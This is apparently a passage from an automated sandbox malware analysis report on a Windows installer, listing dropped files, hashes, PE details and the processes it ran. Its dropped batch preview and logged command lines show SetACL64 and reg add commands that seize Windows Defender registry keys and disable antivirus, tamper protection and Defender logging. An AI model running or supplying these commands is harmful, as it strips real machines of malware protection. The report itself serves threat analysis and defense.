                                                SSDEEP:192:OBoBaf8nBftOMBzALyeKv9eA3sQlxRyEiLivnzA6fFrs3qUEGA6oh/HbzBBzKF6a:vK
                                                MD5:4F452A4396042213CF675A0A9EA03643
                                                SHA1:F46F8B37112F04DAEF0C5408D5AACF076EEB4B52
                                                SHA-256:EE79BB638FDE456E18195A6A5882616B9A6E9390965CB3365AE6873E92F6F090
                                                SHA-512:CC501309C5E946E6F157E3A14D0048B929852CE6C4C1ED910ACC7E37E8BDCB77475B5411B2372410D2827F5CE08D1FF8D2301A949385A5550514EF7E9B8B6F0F
                                                Malicious:false
                                                Preview: @echo off & title f & color 17.. cd %~dp0.. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators".. SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full".. reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1"

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\nsExec.dll

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):7168
                                                Entropy (8bit):5.2959870663251625
                                                Encrypted:false
                                                SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                                MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                                SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                                SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                                SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 0%, Browse
                                                Joe Sandbox View:
                                                • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                                • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                                • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                                • Filename: SCAN00381638.SCR.exe, Detection: malicious, Browse
                                                • Filename: SCAN00381638.SCR.exe, Detection: malicious, Browse
                                                • Filename: setup#U67e5#U770b.exe, Detection: malicious, Browse
                                                • Filename: BxBT7a2sCE.exe, Detection: malicious, Browse
                                                • Filename: f1vPbtLjJn.exe, Detection: malicious, Browse
                                                • Filename: PO 345504521#.exe, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):5120
                                                Entropy (8bit):3.8201777744499874
                                                Encrypted:false
                                                SSDEEP:48:6isDgDtjQHbc6akyAnx2mMM4ife1QivkZZtMlDIra569FHpfbNtm:X1JQpjVfeT1+fzNt
                                                MD5:6B1213639BC5FFC4F1AF8C17420D4B1F
                                                SHA1:EE2D622099FB19A8ED7E1C6137F60AC86FA65486
                                                SHA-256:1FA9E2264B4954F01A83F6A4E8BC7982516091E0FB0C6A2F6154FA87164148B7
                                                SHA-512:03A81297F140B0428636452075C1465D895485268BA243B03562495A5FF46CD392EF8D1A13D0C738D2CF3B560D0EF73AFCC63F210B3BDBF4D931E2E204CF4498
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 5%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Q..e.........."...0..............'... ...@....@.. ....................................@..................................'..O....@.......................`......X&............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H........ ...............................................................0..$.......s............o.......,..o.......&..*.................... ........(....*BSJB............v2.0.50727......l.......#~..P...h...#Strings............#US.........#GUID...........#Blob...........G..........3....................................................................d.....8.......................k.....7.....P...........x.....V...........L.....^.S...5.......................'.=.....P ..........

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\uxdabweej.exe.config

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):281
                                                Entropy (8bit):5.066733139951878
                                                Encrypted:false
                                                SSDEEP:6:TMVBd1IGMfVymRMT4/0xFCqa7VNQA1Q7VJdfEyFRfyrhAW4QIm:TMHdGGsVymhs8rzcrfyW3xm
                                                MD5:4E15196F1F466FB6200550D7F678BB9D
                                                SHA1:F474593BCC3148464D6DE0E0D3DF58C76A9718AB
                                                SHA-256:5C3A338369C8B23A7021732FB167AB0FCB3C4BE9B6EEC7A726C8D9875890CCC1
                                                SHA-512:6B3E8C65D3ECCC1DBF32C957CDC0AB05E85680603ED43587194E93B4117292290085A14D1711872B1C6277159E50E409EEFDA813A13FC314A63BEC6DE2D95E43
                                                Malicious:true
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup useLegacyV2RuntimeActivationPolicy="true"> .. .. <supportedRuntime version="v2.0.50727"/><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.0,Profile=Client"/></startup>..</configuration>..

                                                C:\Users\user\AppData\Local\Temp\nse5B61.tmp\win_version_csharp.exe

                                                Download File
                                                Process:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):6144
                                                Entropy (8bit):4.655569464152001
                                                Encrypted:false
                                                SSDEEP:96:/uidPNKO2mkcQ7DBOrkB0kPkKXwF4dkd8Nue3qYMns1BjgtRQWWzNt:FIOu7DBOrkB0kPkKXwF4dkd8Nn34nUBR
                                                MD5:7CB364701028767F8942CC3F8439F8F2
                                                SHA1:D6BEDE2206B7042B4CAE32F416E1B43FFAC94238
                                                SHA-256:A2716605F8DD1930808E6918DB670A3FE32287791862883DBABD26849B87B09E
                                                SHA-512:3011B3D64F79280AB05DE9658C4F5A13F637AD2E79D5770CFAEB3AF6CB8C7A56B610DAD69FDF295112BE64CFB80E18F30BB1829EB3C0E549105F63D0E770DC13
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                • Antivirus: Virustotal, Detection: 1%, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...dK............"...0.............:-... ...@....@.. ....................................`..................................,..O....@.......................`......P,..8............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................-......H.......P!...............................................................0..V.........(....,Lr...p......%..{..........%..{..........%..{..........%. ]X..(..........(....*..(....*...0..Z.........}......}......}.............. ....}......(....-&..{....}......{....}......{....}.....*.*...0............(....,..{..........*.*..(....*BSJB............v4.0.30319......l.......#~..L.......#Strings.... ...$...#US.D.......#GUID...T.......#Blob...........W=.........3................#.......

                                                Static File Info

                                                General

                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                Entropy (8bit):7.975632365239815
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:Ms63nDrOBa.exe
                                                File size:902'871 bytes
                                                MD5:ad3a57927668a9560b5f01d7ff54c881
                                                SHA1:d0c66b9b5e5f58baff91f23f91a67fd3e8359662
                                                SHA256:efc2d3750186e0038a9bfb4e292298f92bce9f80d2af0a992a3e5fe0c9f29ecf
                                                SHA512:5d9f7f4c416a98cc2642e902fdbff240eca85e834021bbe6d29b1a1f892eaebea338254cd7354bce3c89d2ce0c47a8a5c72d94babf5ee34e04960648fcdc5733
                                                SSDEEP:24576:MGxOmgcf/CoFPz8s43+ae4Y9hJ9HFtMr6lLwLkM0VP90esL:Xx/zCoZz943+YaJNFtM+5wL3AP9KL
                                                TLSH:761523BEA3C9D877E1E312700B5905750BD25E166D98893AE7933CC8B737702AB6D306
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L...Y..d.................h....:....

                                                File Icon

                                                Icon Hash:202c38303420a0cd

                                                Static PE Info

                                                General

                                                Entrypoint:0x40350f
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x64A0DC59 [Sun Jul 2 02:09:29 2023 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:4
                                                OS Version Minor:0
                                                File Version Major:4
                                                File Version Minor:0
                                                Subsystem Version Major:4
                                                Subsystem Version Minor:0
                                                Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                Entrypoint Preview

                                                Instruction
                                                sub esp, 000003F8h
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                pop edi
                                                xor ebp, ebp
                                                push 00008001h
                                                mov dword ptr [esp+20h], ebp
                                                mov dword ptr [esp+18h], 0040A2D8h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [004080A4h]
                                                mov esi, dword ptr [004080A8h]
                                                lea eax, dword ptr [esp+34h]
                                                push eax
                                                mov dword ptr [esp+4Ch], ebp
                                                mov dword ptr [esp+0000014Ch], ebp
                                                mov dword ptr [esp+00000150h], ebp
                                                mov dword ptr [esp+38h], 0000011Ch
                                                call esi
                                                test eax, eax
                                                jne 00007F60F52306EAh
                                                lea eax, dword ptr [esp+34h]
                                                mov dword ptr [esp+34h], 00000114h
                                                push eax
                                                call esi
                                                mov ax, word ptr [esp+48h]
                                                mov ecx, dword ptr [esp+62h]
                                                sub ax, 00000053h
                                                add ecx, FFFFFFD0h
                                                neg ax
                                                sbb eax, eax
                                                mov byte ptr [esp+0000014Eh], 00000004h
                                                not eax
                                                and eax, ecx
                                                mov word ptr [esp+00000148h], ax
                                                cmp dword ptr [esp+38h], 0Ah
                                                jnc 00007F60F52306B8h
                                                and word ptr [esp+42h], 0000h
                                                mov eax, dword ptr [esp+40h]
                                                movzx ecx, byte ptr [esp+3Ch]
                                                mov dword ptr [007A8318h], eax
                                                xor eax, eax
                                                mov ah, byte ptr [esp+38h]
                                                movzx eax, ax
                                                or eax, ecx
                                                xor ecx, ecx
                                                mov ch, byte ptr [esp+00000148h]
                                                movzx ecx, cx
                                                shl eax, 10h
                                                or eax, ecx
                                                movzx ecx, byte ptr [esp+0000004Eh]

                                                Rich Headers

                                                Programming Language:
                                                • [EXP] VC++ 6.0 SP5 build 8804

                                                Data Directories

                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3e00000x42a8.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                Sections

                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x66b10x6800fc80ef3332ba3a0dd802b98a9723e67dFalse0.6719501201923077data6.466881320096335IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xa0000x39e3780x60089ffa2c22129e298ad6a3abf19eb19b0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x3a90000x370000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0x3e00000x42a80x44008fd15985020fbabc749233d6fb67da82False0.3312844669117647data5.175218885302942IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                Resources

                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0x3e01f00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.3017634854771784
                                                RT_ICON0x3e27980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.3651500938086304
                                                RT_ICON0x3e38400x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.5336879432624113
                                                RT_DIALOG0x3e3ca80x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x3e3da80x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x3e3ec80x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x3e3f280x30dataEnglishUnited States0.8333333333333334
                                                RT_MANIFEST0x3e3f580x349XML 1.0 document, ASCII text, with very long lines (841), with no line terminatorsEnglishUnited States0.5517241379310345

                                                Imports

                                                DLLImport
                                                ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                Possible Origin

                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States

                                                Network Behavior

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jul 12, 2024 09:53:32.590533972 CEST53556361.1.1.1192.168.2.6

                                                Statistics

                                                CPU Usage

                                                Click to jump to process

                                                Memory Usage

                                                Click to jump to process

                                                High Level Behavior Distribution

                                                Click to dive into process behavior distribution

                                                Behavior

                                                Click to jump to process

                                                System Behavior

                                                General

                                                Target ID:0
                                                Start time:03:53:11
                                                Start date:12/07/2024
                                                Path:C:\Users\user\Desktop\Ms63nDrOBa.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\Ms63nDrOBa.exe"
                                                Imagebase:0x400000
                                                File size:902'871 bytes
                                                MD5 hash:AD3A57927668A9560B5F01D7FF54C881
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:2
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn.bat
                                                Imagebase:0x1c0000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:3
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:4
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 0%, ReversingLabs
                                                • Detection: 0%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:5
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nse5B61.tmp\bn1.bat
                                                Imagebase:0x1c0000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:6
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66e660000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                General

                                                Target ID:7
                                                Start time:03:53:12
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:8
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:9
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:10
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:11
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:12
                                                Start time:03:53:13
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                General

                                                Target ID:13
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Users\user\AppData\Local\Temp\nse5B61.tmp\SetACL64.exe
                                                Wow64 process (32bit):false
                                                Commandline:SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"
                                                Imagebase:0x7ff7c1700000
                                                File size:616'312 bytes
                                                MD5 hash:1FB64FF73938F4A04E97E5E7BF3D618C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:14
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:15
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:16
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:17
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

                                                Target ID:18
                                                Start time:03:53:14
                                                Start date:12/07/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f
                                                Imagebase:0x4b0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                General

